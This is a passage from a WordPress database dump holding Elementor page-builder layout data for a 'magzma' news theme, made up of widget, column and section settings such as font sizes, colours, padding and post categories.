"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1327,464,'_elementor_version','0.4'),(1328,464,'_elementor_css','a:3:{s:4:\"time\";i:1508911735;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1330,465,'_elementor_edit_mode','builder'),(1331,465,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"